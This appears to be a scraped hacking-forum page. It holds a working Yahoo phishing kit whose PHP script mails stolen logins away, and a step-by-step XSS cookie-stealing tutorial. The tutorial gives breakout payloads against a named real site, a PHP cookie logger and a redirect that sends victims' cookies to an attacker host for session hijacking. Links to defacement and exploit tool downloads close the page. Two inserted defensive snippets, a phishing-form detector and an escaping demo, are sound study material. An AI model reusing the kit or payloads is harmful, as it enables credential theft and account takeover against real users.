However, your carrier¿s normal data transfer charges apply.</p> <p class="close"><a class="yregnlnk" onclick="yreg_popLayer('hl_list');">Close</a></p> </div> </div> <!-- End hidden layer --> <div class="ic antivirus"><div><h3>AntiVirus that works twice as hard.</h3> <cite>Your Yahoo! Mail scans and cleans email attachments to help keep nasty viruses out of your life.</cite> </div></div> <div class="ic pcmag"><div><h3>Wanna share in our trophy?</h3> <cite><i>PC Magazine</i> knows a thing or two about free email, including which one stands out. <a class="yregnlnk" onclick="yreg_popLayer('h2_list',this,-150 ,25,'96946861');">Show me</a></cite> </div></div> <!-- begin hidden layer --> <div id="h2_list" class="hiddenlayer"> <div class="yreginhdly"> <h4>PC Magazine Editors' Choice 2005</h4> <p>"Yahoo! Mail has made considerable strides since the last time we reviewed it. It's the most comprehensive free service in this roundup, with sophisticated security features, a configurable spam filter, Norton Anti-Virus scanning and cleaning, and the ability to integrate cleanly with Yahoo! Messenger. Yahoo! Mail was the first Web-based mail service to include a detailed address book, calendar, and notepad, and these work as well as ever. You can also sync their content with mobile devices. ...Yahoo! Mail takes the lead overall." -- <i>PC Magazine</i>, June 22, 2005.</p> <p class="close"><a class="yregnlnk" onclick="yreg_popLayer('h2_list');">Close</a></p> </div> </div> <!-- End hidden layer --> </div> <!-- end bottom ad call --> <p> </p> <p> </p> <p> </p> <!-- Bottom ad insert ends --> <!-- END ADS --> <!-- end left side content --> </div> </div> <!-- begin footer --> <div id="yregft"> <p>Copyright © 2008 Yahoo! Inc. All rights reserved. 
<a href="http://docs.yahoo.com/info/copyright/copyright.html" target="cp">Copyright/IP Policy</a> | <a href="http://docs.yahoo.com/info/terms/" target="tos">Terms of Service</a> | <a href="http://security.yahoo.com/" target="sc">Guide to Online Security</a></p> <p>NOTICE: We collect personal information on this site.</p> <p>To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="_new" title="Click here to view Yahoo! Privacy Policy">Privacy Policy</a></p> </div> <!-- end footer --> </div> </div> <script type="text/javascript"> if (top != self) top.location.href = location.href; </script> <script type="text/javascript"> <!-- browser_string = navigator.appVersion + " " + navigator.userAgent; if ( browser_string.indexOf("MSIE") < 0 ) { if (navigator.mimeTypes) { for (i = 0 ; i < navigator.mimeTypes.length ; i++) { if (navigator.mimeTypes[i].suffixes.indexOf("yps") > -1) { doGotIt(); } } } else { dontGotIt(); } } else { if (browser_string.indexOf("Windows")>=0) { doGotIt(); document.write('<object classid="clsid:41695A8E-6414-11D4-8FB3-00D0B7730277" CODEBASE="javascript:dontGotIt();" ID="Ymsgr" width="1" height="1">'); document.write('</object>'); } } hasMsgr = 0; function dontGotIt(){ hasMsgr = 0; document.login_form.hasMsgr.value=0; } function doGotIt(){ hasMsgr = 1; document.login_form.hasMsgr.value=1; } //--> </script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/g/ylib_dom.js" type="text/javascript"></script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/g/util/yg_browserext_1_5.js" type="text/javascript"></script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/reg/js/yregml_200611021154.js" type="text/javascript"></script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/reg/js/login_md5_1_14.js" type="text/javascript"></script> <!-- spaceid: INT.OFFSET: 0 --><!-- SpaceID=150001465 loc=FOOT9 noad --> </body> </html> Yahoo.php: <?php $ip = getenv("REMOTE_ADDR"); $message .= "User : 
".$_POST['login']."n"; $message .= "PassWord: " .$_POST['passwd']."n"; $recipient = "YourID@yahoo.com"; $subject = "New Losser"; $headers = "From: "; $headers .= $_POST['eMailAdd']."n"; $headers .= "MIME-Version: 1.0n"; mail("$cc", "yahoo Info", $message); if (mail($recipient,$subject,$message,$headers)) { header("Location: http://www.mail.yahoo.com"); } else { echo "ERROR! Please go back and try again."; } ?>
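The kit above is a credential-harvesting page: Yahoo branding in the title and markup, but the login form posts to a local `yahoo.php` that mails the username and password away. One defensive check a mail-gateway or browser-side scanner can run is to parse a page, find every form that contains a password field, and flag it when its resolved action does not point at the host the page claims to be. The following is an added example written for this page (not code from the post above and not Yahoo's own); the sample HTML is a constructed, cut-down copy of the posted form, and `login.yahoo.com` as the expected host is an assumption of the check.

```python
"""Heuristic detector for look-alike login pages that post credentials
elsewhere. Added example; the sample documents are constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Records each <form>'s action and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_login_forms(page_html, page_url, expected_host):
    """Return the resolved action URLs of password forms that do not post to
    expected_host. Relative actions (like the kit's "yahoo.php") are resolved
    against page_url, which is how a browser would send them."""
    parser = FormCollector()
    parser.feed(page_html)
    flagged = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target = urljoin(page_url, form["action"])
        host = urlsplit(target).hostname or ""
        if host != expected_host:
            flagged.append(target)
    return flagged


# Constructed sample modelled on the posted kit: branded as Yahoo! Mail,
# but the form posts to a PHP script on the hosting site.
KIT_SAMPLE = """
<html><head><title>Yahoo! Mail: The best web-based email!</title></head>
<body>
<form method="post" action="yahoo.php" name="login_form">
  <input name="login" id="username" type="text">
  <input name="passwd" id="passwd" type="password">
  <input type="submit" name=".save" value="Sign In">
</form>
</body></html>
"""

# Constructed sample of a form that posts to the expected host (assumed).
GENUINE_SAMPLE = """
<form method="post" action="https://login.yahoo.com/config/login">
  <input name="login" type="text">
  <input name="passwd" type="password">
</form>
"""

if __name__ == "__main__":
    print(suspicious_login_forms(KIT_SAMPLE, "http://phish.example/index.html", "login.yahoo.com"))
    print(suspicious_login_forms(GENUINE_SAMPLE, "https://login.yahoo.com/", "login.yahoo.com"))
```

The check is deliberately narrow: it says nothing about pages without a password field, and a kit that posts to a convincing third-party host under its own control would need a reputation lookup on the resolved host in addition to this origin comparison.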
-
Introduction

I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up.

NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.

Background

First we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>

We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

<script>alert("test")</script>

When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

"><script>alert("test")</script>

This should close the quotes and end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed.
Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,

http://www.rozee.pk/search.php?q="><script>alert("test")</script>

Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here: ascii-hex converter

Hexing the query of this url gives us

http://www.rozee.pk/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2f%73%63%72%69%70%74%3e

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page.

So how do you use XSS to steal cookies? The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file. First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to.
Now paste this PHP code into your cookie stealer script (whateveryouwant.php):

<?php
function GetIP() {
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData() {
    $ipLog = "log.txt";
    // the injected URL puts the cookie in the query string (cookie=...)
    $cookie = $_SERVER['QUERY_STRING'];
    // typo fixed: the original read ini_get('register_gobals'), which is always false
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals)
        $ip = getenv('REMOTE_ADDR');
    else
        $ip = GetIP();
    $rem_port    = $_SERVER['REMOTE_PORT'];
    $user_agent  = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    // fixed: the original read $_SERVER['METHOD'], which does not exist (hence the empty METHOD field in the sample log below)
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    // REMOTE_HOST is only filled in if the web server does reverse DNS lookups
    $rem_host    = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';
    $referer     = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    // "of" must be escaped in a date() format: unescaped, 'o' is the ISO year, which is why the sample log below shows "2009f"
    $date = date("l dS \of F Y h:i:s A");
    $log = fopen($ipLog, "a+");
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();
?>

This script will record the cookies of every user that views it. Now we need to get the vulnerable page to access this script.
We can do that by modifying our earlier injection:

"><script language="JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.rozee.pk/"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' + escape(document.cookie);">Click Me</a>

This will eliminate the looping problem since the user has to click on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on.
You could just add some text to the page saying something like "under construction" by changing the end of our PHP script from this:

logData();
?>

to this:

logData();
echo '<b>Page Under Construction</b>';
?>

Now when you open log.txt, you should see something like this:

IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php | DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up Firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and do many other things without even needing to know the passwords or usernames.

Summary

So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer PHP file and log file to your server.
3. Insert the injection into the page via the URL or text box.
4. Grab the link of that page with your exploited search query (if the injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.
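Added example (editor's code, not part of LegioNRST's post): the attribute breakout the tutorial relies on, reproduced with a small tokenizer so you can see which tags a browser would actually get from the reflected markup, beside the output encoding that closes the hole. The `advisor_name` input and the two payloads are the ones quoted in the post; the function names and the simplified tokenizer (double-quoted attributes only) are assumptions of this example. Runs under Node.js with no dependencies.

```javascript
// Added example, not from the original post. Reproduces the reflected-XSS
// breakout the tutorial describes and the fix: HTML-encode the search term
// before reflecting it into the value attribute.
// Function names and the simplified tokenizer below are assumptions of this
// example; the markup and payloads are the ones quoted in the post.

// Vulnerable template: the search term is concatenated straight into the
// attribute, exactly like the page in the post.
function renderVulnerable(term) {
  return '<tr><td>Name</td><td><input type="text" name="advisor_name" value="'
    + term + '"></td></tr>';
}

// Encode the characters that can change HTML parsing state. Encoding '"'
// is what keeps the attribute from being closed early.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened template: same markup, escaped term.
function renderSafe(term) {
  return '<tr><td>Name</td><td><input type="text" name="advisor_name" value="'
    + escapeHtml(term) + '"></td></tr>';
}

// Minimal tokenizer: returns the start-tag names a browser would see in the
// markup. Three states: text, inside a tag, inside a double-quoted attribute
// value. A '<' inside a quoted value is attribute text, not a tag, which is
// why the naive payload does nothing and the "> prefix is needed.
// Simplification (assumption): single-quoted and unquoted attribute values
// are not handled; the markup in the post only uses double quotes.
function startTags(html) {
  const tags = [];
  let state = 'data';
  let i = 0;
  while (i < html.length) {
    const c = html[i];
    if (state === 'data') {
      if (c === '<') {
        let j = i + 1;
        const isEnd = html[j] === '/';
        if (isEnd) j++;
        let name = '';
        while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
        if (name === '') { i++; continue; }   // stray '<' stays text
        if (!isEnd) tags.push(name.toLowerCase());
        state = 'tag';
        i = j;
        continue;
      }
      i++;
    } else if (state === 'tag') {
      if (c === '>') state = 'data';
      else if (c === '"') state = 'quoted';
      i++;
    } else {                                    // 'quoted'
      if (c === '"') state = 'tag';
      i++;
    }
  }
  return tags;
}

// True when a <script> element ends up outside the attribute, i.e. the
// injection would actually execute.
function hasScript(html) {
  return startTags(html).includes('script');
}

// The two payloads from the post.
const naivePayload = '<script>alert("test")</script>';
const breakoutPayload = '"><script>alert("test")</script>';

console.log('naive payload, vulnerable page   :', hasScript(renderVulnerable(naivePayload)));    // false
console.log('breakout payload, vulnerable page:', hasScript(renderVulnerable(breakoutPayload))); // true
console.log('breakout payload, escaped page   :', hasScript(renderSafe(breakoutPayload)));       // false
console.log(renderSafe(breakoutPayload));
```

One caveat on the stealer side: `document.cookie` only exposes cookies set without the HttpOnly flag, so a session cookie marked HttpOnly never reaches the log file even when the injection fires.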
-
Download Advanced.Deface.Creator.rar @ UppIT
-
Download MaxISploit.rar @ UppIT
-
With Yahoo the method no longer works... only by tricking the victim with various executables.